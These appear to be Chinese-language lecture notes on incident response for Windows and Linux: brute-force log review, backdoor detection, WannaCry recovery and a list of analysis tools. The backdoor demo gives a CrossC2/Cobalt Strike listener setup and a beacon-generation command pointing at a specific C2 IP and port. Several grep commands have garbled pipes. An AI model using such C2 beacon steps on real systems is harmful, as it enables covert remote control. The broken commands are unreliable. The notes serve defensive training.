74 应急响应-win&linux分析后门&勒索病毒&攻击
目录
-
- 操作系统(windows,linux)应急响应:
-
- 常见日志类别及存储:
- 补充资料:
- 病毒分析
- 病毒查杀
- 病毒动态
- 在线病毒扫描网站
- 演示案例:
-
- 攻击响应-暴力破解(RDP,SSH)-Win,Linux
- 控制响应-后门木马(Webshell,PC)-Win,Linux
- 危害响应-病毒感染(勒索WannaCry)-Windows
- 自动化响应检测-Gscan多重功能脚本测试-Linux
- 下载地址:
操作系统(windows,linux)应急响应:
1.常见危害: 暴力破解,漏洞利用,流量攻击,木马控制(webshell,PC木马等),病毒感染(挖矿,蠕虫,勒索等)。
流量攻击:只是会对数据和服务器的正常运转、运行会受到干扰,但是他不会把你服务器上的权限和敏感的东西泄露出去,也不会造成服务器上的数据和权限丢失
对方通过一些漏洞或者权限得到服务器的权限之后,实现木马或者病毒上面的一些感染,来危害到服务器的正常运行,导致服务器异常
pc木马(控制系统的木马)、网站木马,根据当前操作系统windows和linux、mac os,这里网上都有相对应的系统,还有一些app的,这里我们主要介绍的是pc
这个木马需要用到第三方软件,因为现在出现了很多免杀木马,有时候杀毒软件查杀不到,这个时候就需要借助于我们人为的去分析,那些程序在运行过程中有异常,来判定出这个程序有后门,并且找到这个后门一步步到服务器上面去
当前在我们互联网比较出名的挖矿程序和勒索
2.常见分析: 计算机账户,端口,进程,网络,启动,服务,任务,文件等安全问题
看一下计算机上面有没有一些新增的,账户有没有异常,一般攻击者会留一个后门账户,方便他下次的连接,这个是有一定经验的
判断出服务器上端口的连接情况,有没有一些后门进程,对外部的一些连接
还有些进程信息能直接了然的看到,系统自带的进程,第三方应用的进程,还有一些不知道的进程,来判定出有没有一些可疑进程在执行
网络就和端口差不多,根据当前的网络环境来判断
服务器在重启之后,会自动加载一些程序或者应用
木马在控制的时候为了保持权限一直存在,当服务器重启之后,木马会失效,但是这个木马为了长期控制,他就会把木马写到系统项和服务名,或者是注册表里面,当服务器重启之后,还会加载这些东西,那么木马会再去重新运行上线,实现重新控制,所以这些地方真的要去看
看一下文件有没有被泄露,有没有被更改权限,有没有被进行恶意的删除,那这些东西都要进行分析的
常见日志类别及存储:
Windows,Linux
我们一定要借助日志,这攻击是如何实现的,日志里面有些类别,有给予这个应用服务器日志、系统日志,比如一些登录事件,什么时候登录过这台服务器,什么时候注销过这台服务器,这些信息都在日志里面有保存,进一步分析攻击者在服务器上做了那些事情,存储表示日志会储存在那些地方,能不能修改
补充资料:
应急响应大合集:https://xz.aliyun.com/t/485
史上最全Windows安全工具锦集:https://www.secpulse.com/archives/114019.html
系统内部:https://learn.microsoft.com/en-us/sysinternals/
提供windows自带工具,好处在于用起来非常方便,不会涉及到杀毒软件误杀,运行不了的情况
病毒分析
PCHunter:http://www.xuetr.com
火绒剑:https://www.huorong.cn
Process Explorer:https://docs.microsoft.com/zh-cn/sysinternals/downloads/process-explorer
processhacker:https://processhacker.sourceforge.io/downloads.php
autoruns:https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
OTL:https://www.bleepingcomputer.com/download/otl/
SysInspector:http://download.eset.com.cn/download/detail/?product=sysinspector
病毒查杀
卡巴斯基:http://devbuilds.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe
大蜘蛛:http://free.drweb.ru/download+cureit+free
火绒安全软件:https://www.huorong.cn
360 杀毒:http://sd.360.cn/download_center.html
病毒动态
CVERC-国家计算机病毒应急处理中心:http://www.cverc.org.cn
微步在线威胁情报社区:https://x.threatbook.cn
火绒安全论坛:http://bbs.huorong.cn/forum-59-1.html
爱毒霸社区:http://bbs.duba.net
腾讯电脑管家:http://bbs.guanjia.qq.com/forum-2-1.html
在线病毒扫描网站
http://www.virscan.org / /多引擎在线病毒扫描网
https://habo.qq.com / /腾讯哈勃分析系统
https://virusscan.jotti.org / /Jotti 恶意软件扫描系统
http://www.scanvir.com //计算机病毒、手机病毒、可疑文件分析
演示案例:
攻击响应-暴力破解(RDP,SSH)-Win,Linux
Windows-LogFusion载入查看:
事件归类,事件ID,事件状态等,参考百度资料
Linux-grep筛选:
1、统计了下日志,确认服务器遭受多少次暴力破解
grep -o “Failed password” /var/log/secureluniq -c
2、输出登录爆破的第一行和最后一行,确认爆破时间范围:
grep “Failed password” /var/log/secure l head -1
grep “Failed password” /var/log/secure l tail -1
3、进一步定位有哪些IP在爆破?
我们不确定对方采用什么攻击方式,所以我们都要看,有可能是漏洞有可能是暴力破解,暴力破解就跟日志挂的会比较深入一点,因为漏洞会有些日志记录不上
控制响应-后门木马(Webshell,PC)-Win,Linux
windows: 默认配置测试
linux借助CrossC2项目: netstat -ntulp
https://github.com/gloxec/CrossC2
https://github.com/darkr4y/geacon
参考过程: http://www.adminxe.com/1287.html
1.项目上传至服务端目录,给予执行权限
2.配置监听器:
windows/beacon_https/reverse_https 阿里云记得端口放行
3.生成后门:
./genCrossC2.Linux 47.99.49.65 5566 null null Linux x64 C2
通过网络监听工具及windows日志分析或执行记录查找后门问题
windows上面的一个木马,我们用到的控制木马是cs,常见安全攻击工具cs,然后去分析一下这个木马,如何去判定他,在实战情况下,我们可以借助杀毒软件,来对服务器的其它文件进行扫描,探针有没有可疑的木马病毒
cs面向的是windows的渗透项目,但是后期经过其它人的更改,后面也支持linux的上线
cs支持情况
危害响应-病毒感染(勒索WannaCry)-Windows
详细说明中毒表现及恢复指南
https://lesuobingdu.360.cn/
https://www.nomoreransom.org/zh/index.html
做勒索病毒查看演示的话,一定要小心在小心,本机没有装补丁或者没有拦截可能自己感染,那就很尴尬
中毒的表现就是会把你所有的文档文件都给改了,突然一下弹了个窗口,然后就变成这样了,文件啥都看不到了
编辑打开就是txt内容,但这里打开就会变成这样子,让你交钱解密
病毒样本,网上也能下到,演示的话,最好是放到虚拟机上去运行,不要放在本机上面搞,到时候又要重装电脑搞一些东西
我们不是研究病毒,研究逆向这块的,他的技术属于逆向这块的技术,
在线解密,把我们上传的留言文件,还有上传加密文件,因为它会对文档进行加密,办公的一些文档资料全部加密了,打不开
能不能解密成功,就看勒索病毒厉不厉害,再就看平台支不支持
有些勒索病毒实在是没有办法,这个时候可以尝试找花钱的网站去尝试一下,当然花钱也不一定能够搞出来
有的是基于漏洞的,ms17-010,还有一种是没有打补丁,系统本身存在系统漏洞;自己在网站上面乱七八遭的乱下,导致的
不要乱下,长期打补丁,并且更新杀毒软件,在服务器上保持干净,不要乱下一些乱七八遭的软件,中毒还有一种情况是被别人给危害了,可能你的内网主机,之前勒索病毒爆发的时候,出过爆发漏洞,然后进行内网渗透,自带感染,但是我们要想到,他是基于漏洞的,提前做好补丁,安装好防护的话,其实是能够直接解决这个问题的,总的来说就是管理员的疏忽,没有定期的更新补丁,做好漏洞的防范,就不会导致这样的事情
解密就是免费工具或者花钱
自动化响应检测-Gscan多重功能脚本测试-Linux
GScan文件对比,可以去学习一下
木马和病毒是两方面,木马主要是为了控制,病毒是一个恶意的程序,他会把你服务器上正常的东西搞得不正常,木马不会影响到你正常的情况,你的服务器会被他实时监控
下载地址:
https://github.com/gloxec/CrossC2
https://github.com/darkr4y/geacon/
https://github.com/grayddq/GScan/
https://bbs.pediy.com/thread-217586-1.htm
https://www.nomoreransom.org/zh/index.html
https://docs.microsoft.com/en-us/sysinternals/
https://www.secpulse.com/archives/114019.html
https://pan.baidu.com/s/1tQS1mUelmEh3168AL7yXGg 提取码: xiao